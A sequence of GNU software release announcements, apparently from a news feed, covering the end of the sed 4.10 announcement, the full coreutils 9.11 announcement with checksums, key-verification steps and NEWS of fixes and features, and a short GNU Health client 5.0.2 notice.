wget -q -O- 'https://savannah.gnu.org/project/release-gpgkeys.php?group=sed&download=1' | gpg --import -
As a last resort to find the key, you can try the official GNU
keyring:
wget -q https://ftp.gnu.org/gnu/gnu-keyring.gpg
gpg --keyring gnu-keyring.gpg --verify sed-4.10.tar.gz.sig
This release is based on the sed git repository, available as
git clone https://https.git.savannah.gnu.org/git/sed.git
with commit 89b7a2224d4faa9d8baf76094b1232ad1477ef3e tagged as v4.10.
For a summary of changes and contributors, see:
https://gitweb.git.savannah.gnu.org/gitweb/?p=sed.git;a=shortlog;h=v4.10
or run this command from a git-cloned sed directory:
git shortlog v4.9..v4.10
This release was bootstrapped with the following tools:
Autoconf 2.73.1-b400b
Automake 1.18.1.91
Gnulib 2026-04-19 15211966deb52d4cae425c655177a815a88d3fc0
NEWS
* Noteworthy changes in release 4.10 (2026-04-21) [stable]
** Bug fixes
sed 's/a/b/g' (and other global substitutions) now works on input
lines longer than 2GB. Previously, matches beyond the 2^31 byte offset
would evoke a "panic" (exit 4).
[bug present since the beginning]
'sed --follow-symlinks -i' no longer has a TOCTOU race that could let
an attacker swap a symlink between resolution and open, causing sed to
read attacker-chosen content and write it to the original target.
[bug introduced in sed 4.1e]
sed no longer falsely matches when back-references are combined with
optional groups (.?) and the $ anchor. For example, this no longer
falsely matches the empty string at beginning of line:
$ echo ab | sed -E 's/^(.?)(.?).?\2\1$/X/'
Xab
[bug present since "the beginning"]
In --posix mode, sed no longer mishandles backslash escapes (\n,
\t, \a, etc.) after a named character class like [[:alpha:]].
For example, 's/^A\n[[:alpha:]]\n*/XXX/' would fail to match the
trailing newline, treating \n as a literal backslash and an 'n'
rather than a newline. This happened when an earlier backslash
escape in the same regex had already been converted, shifting the
in-place normalization buffer.
[bug introduced in sed 4.9]
sed --debug no longer crashes when a label (":") command is compiled
before the --debug option is processed, e.g., sed -f<(...) --debug.
[bug introduced in sed 4.7 with --debug]
sed no longer rejects the documented GNU extension 'a**' (equivalent
to 'a*') in Basic Regular Expression (BRE) mode. Previously, this
worked only with -E (ERE mode), even though grep has always accepted
it in BRE mode.
[bug present since "the beginning"]
sed no longer rejects "\c[" in regular expressions
[bug present since the beginning]
'sed --follow-symlinks -i' no longer mishandles an operand that is a
short symbolic link to a long symbolic link to a file.
[bug introduced in sed 4.9]
Fix some some longstanding but unlikely integer overflows.
Internally, 'sed' now more often prefers signed integer arithmetic,
which can be checked automatically via 'gcc -fsanitize=undefined'.
** Changes in behavior
In the default C locale, diagnostics now quote 'like this' (with
apostrophes) instead of `like this' (with a grave accent and an
apostrophe). This tracks the GNU coding standards.
'sed --posix' now warns about uses of backslashes in the 's' command
that are handled by GNU sed but are not portable to other
implementations.
** Build-related
builds no longer fail on platforms without the <getopt.h> header or
getopt_long function.
[bug introduced in sed 4.9]
L'articolo Come costruire una link building coerente con gli obiettivi di visibilità online proviene da FullPress.
This is to announce coreutils-9.11, a stable release.
Notable changes include:
- cut(1), nl(1), and un/expand(1) are multi-byte character aware
- cut(1) supports new -w, -F, -O options for better compatibility
- cat(1) and yes(1) use zero-copy I/O on Linux (up to 15x faster)
- date(1) now parses dot delimited dd.mm.yy format
- cksum --check uses more defensive file name quoting
- shuf -i operates up to 2x faster by using unlocked stdio
- wc -l operates up to 4.5x faster on hosts with neon instructions
- wc -m is up to 2.6x faster when processing multi-byte characters
There have also been many bug fixes and other changes
as summarized in the NEWS below.
There have been 306 commits by 12 people in the 10 weeks since 9.10
Thanks to everyone who has contributed!
Bruno Haible (2) Paul Eggert (15)
Chris Down (2) Pádraig Brady (156)
Collin Funk (91) Sam James (1)
Dr. David Alan Gilbert (1) Sylvestre Ledru (17)
Gabriel (1) Weixie Cui (2)
Lukáš Zaoral (2) oech3 (19)
Pádraig [on behalf of the coreutils maintainers]
==================================================================
Here is the GNU coreutils home page:
https://gnu.org/s/coreutils/
Here are the compressed sources:
https://ftp.gnu.org/gnu/coreutils/coreutils-9.11.tar.gz (16MB)
https://ftp.gnu.org/gnu/coreutils/coreutils-9.11.tar.xz (6.3MB)
Here are the GPG detached signatures:
https://ftp.gnu.org/gnu/coreutils/coreutils-9.11.tar.gz.sig
https://ftp.gnu.org/gnu/coreutils/coreutils-9.11.tar.xz.sig
Use a mirror for higher download bandwidth:
https://www.gnu.org/order/ftp.html
Here are the SHA256 and SHA3-256 checksums:
SHA256 (coreutils-9.11.tar.gz) = IDO4owScBr/0mp486nK99Gg7zQy+uXUhHdVtuvi3Nq4=
SHA3-256 (coreutils-9.11.tar.gz) = TwFrSgPuppf+jNggT+aXj037UfVVS2BmYBxXiPLYKxs=
SHA256 (coreutils-9.11.tar.xz) = OUAk7aCllVIXztqc0SAeZdyPo6opwpURNaSVIdV8PMM=
SHA3-256 (coreutils-9.11.tar.xz) = RkpNMip8O4ly+z3Fef9X20AsotbT1ycBZ5UbG84SiNM=
Verify the base64 SHA256 checksum with 'cksum -a sha256 --check'
from coreutils-9.2 or OpenBSD's cksum since 2007.
Verify the base64 SHA3-256 checksum with 'cksum -a sha3 --check'
from coreutils-9.8.
Use a .sig file to verify that the corresponding file (without the
.sig suffix) is intact. First, be sure to download both the .sig file
and the corresponding tarball. Then, run a command like this:
gpg --verify coreutils-9.11.tar.gz.sig
The signature should match the fingerprint of the following key:
pub rsa4096/0xDF6FD971306037D9 2011-09-23 [SC]
Key fingerprint = 6C37 DC12 121A 5006 BC1D B804 DF6F D971 3060 37D9
uid [ultimate] Pádraig Brady <P@draigBrady.com>
uid [ultimate] Pádraig Brady <pixelbeat@gnu.org>
If that command fails because you don't have the required public key,
or that public key has expired, try the following commands to retrieve
or refresh it, and then rerun the 'gpg --verify' command.
gpg --locate-external-key P@draigBrady.com
gpg --recv-keys DF6FD971306037D9
wget -q -O- 'https://savannah.gnu.org/project/release-gpgkeys.php?group=coreutils&download=1' | gpg --import -
As a last resort to find the key, you can try the official GNU
keyring:
wget -q https://ftp.gnu.org/gnu/gnu-keyring.gpg
gpg --keyring gnu-keyring.gpg --verify coreutils-9.11.tar.gz.sig
This release is based on the coreutils git repository, available as
git clone https://https.git.savannah.gnu.org/git/coreutils.git
with commit c01fd163a47468a8296fb369f5233853bb551bb6 tagged as v9.11.
For a summary of changes and contributors, see:
https://gitweb.git.savannah.gnu.org/gitweb/?p=coreutils.git;a=shortlog;h=v9.11
or run this command from a git-cloned coreutils directory:
git shortlog v9.10..v9.11
This release was bootstrapped with the following tools:
Autoconf 2.73.1-b400b
Automake 1.18.1
Gnulib 2026-04-19 fb7312fa8d3df29f0ca0678f669b9a5b88a078ec
Bison 3.8.2
NEWS
* Noteworthy changes in release 9.11 (2026-04-20) [stable]
** Bug fixes
'dd' now always diagnoses partial writes correctly upon write failure.
Previously it may have indicated that only full writes were performed.
[This bug was present in "the beginning".]
'fold' will no longer truncate output when encountering 0xFF bytes.
[bug introduced in coreutils-9.8]
'fold' is again responsive to its input. Previously it would have delayed
processing until 256KiB was read from the input.
[bug introduced in coreutils-9.8]
'kill --help' now has links to valid anchors in the html manual.
[bug introduced in coreutils-9.10]
When configured with --enable-systemd, the commands 'pinky',
'uptime', 'users', and 'who' no longer consider the systemd session
classes 'greeter', 'lock-screen', 'background', 'background-light',
and 'none' to be users.
[bug introduced in coreutils-9.4]
'pwd' on ancient systems will no longer overflow a buffer
when operating in deep paths longer than twice the system PATH_MAX.
[bug introduced in coreutils-9.6]
'stat --printf=%%N' no longer performs unnecessary checks of the QUOTING_STYLE
environment variable.
[bug introduced in coreutils-8.26]
'timeout' no longer exits abruptly when its parent is the init process, e.g.,
when started by the entrypoint of a container.
[bug introduced in coreutils-9.10]
** New Features
'cut' now supports multi-byte input and delimiters. Consequently
the -c option is now honored, and no longer an alias for -b, and
the -n option is now honored, and no longer ignored.
Also the -d option supports multi-byte delimiters.
'cut' adds new options for better compatibility:
The -w,--whitespace-delimited option was added to support blank aligned fields
and for better compatibility with FreeBSD/macOS.
The -O option was added as an alias for the --output-delimiter option,
for better compatibility with busybox/toybox.
The -F option was added as an alias for -w -O ' '
for better compatibility with busybox/toybox.
'date --date' now parses dot delimited dd.mm.yy format common in Europe.
This is in addition to the already supported mm/dd/yy and yy-mm-dd formats.
** Changes in behavior
'cksum --check' now uses shell quoting when required, to more robustly
escape file names output in diagnostics.
This also affects md5sum, sha*sum, and b2sum.
** Improvements
'cat' now uses zero-copy I/O on Linux when appropriate, to improve throughput.
E.g., throughput improved 6x from 12.9GiB/s to 81.8GiB/s on a Power10 system.
'df --local' recognises more file system types as remote.
Specifically: autofs, ncpfs, smb, smb2, gfs, gfs2, userlandfs.
'df' improves duplicate mount suppression, by checking each mount against
all previously kept entries for the same device, not just the latest one.
'expand' and 'unexpand' now support multi-byte characters.
'groups' and 'id' will now exit sooner after a write error,
which is significant when listing information for many users.
'install' now allows the combination of the --compare and
--preserve-timestamps options.
'fold', 'join', 'numfmt', 'uniq' now use more consistent blank character
determination on non GLIBC platforms. For example \u3000 (ideographic space)
will be considered a blank character on all platforms.
'nl' now supports multi-byte --section-delimiter characters.
'shuf -i' now operates up to two times faster on systems with unlocked stdio
functions.
'tac' will now exit sooner after a write error, which is significant when
operating on a file with many lines.
'timeout' now properly detects when it is reparented by a subreaper process on
Linux instead of init, e.g., the 'systemd --user' process.
'wc -l' now operates up to four and a half times faster on hosts that support
Neon instructions.
'wc -m' now operates up to 2.6 times faster on GLIBC when processing
non-ASCII UTF-8 characters.
'yes' now uses zero-copy I/O on Linux to significantly increase throughput.
E.g., throughput improved 15x from 11.6GiB/s to 175GiB/s on a Power10 system.
** Build-related
./configure --enable-single-binary=hardlinks is now supported on systems
with dash as the system shell at /bin/sh.
[issue introduced in coreutils-9.10]
The test suite may have failed with a "Hangup" error if run non-interactively.
[issue introduced in coreutils-9.10]
Dear community
The GTK client 5.0.2 of the GNU Health Hospital and Health Management system has been released!
This is a maintenance patchset that fixes the following issues:
You can get the latest GNU Health client from GNU.org, Python Package Index or Codeberg.
Happy hacking!
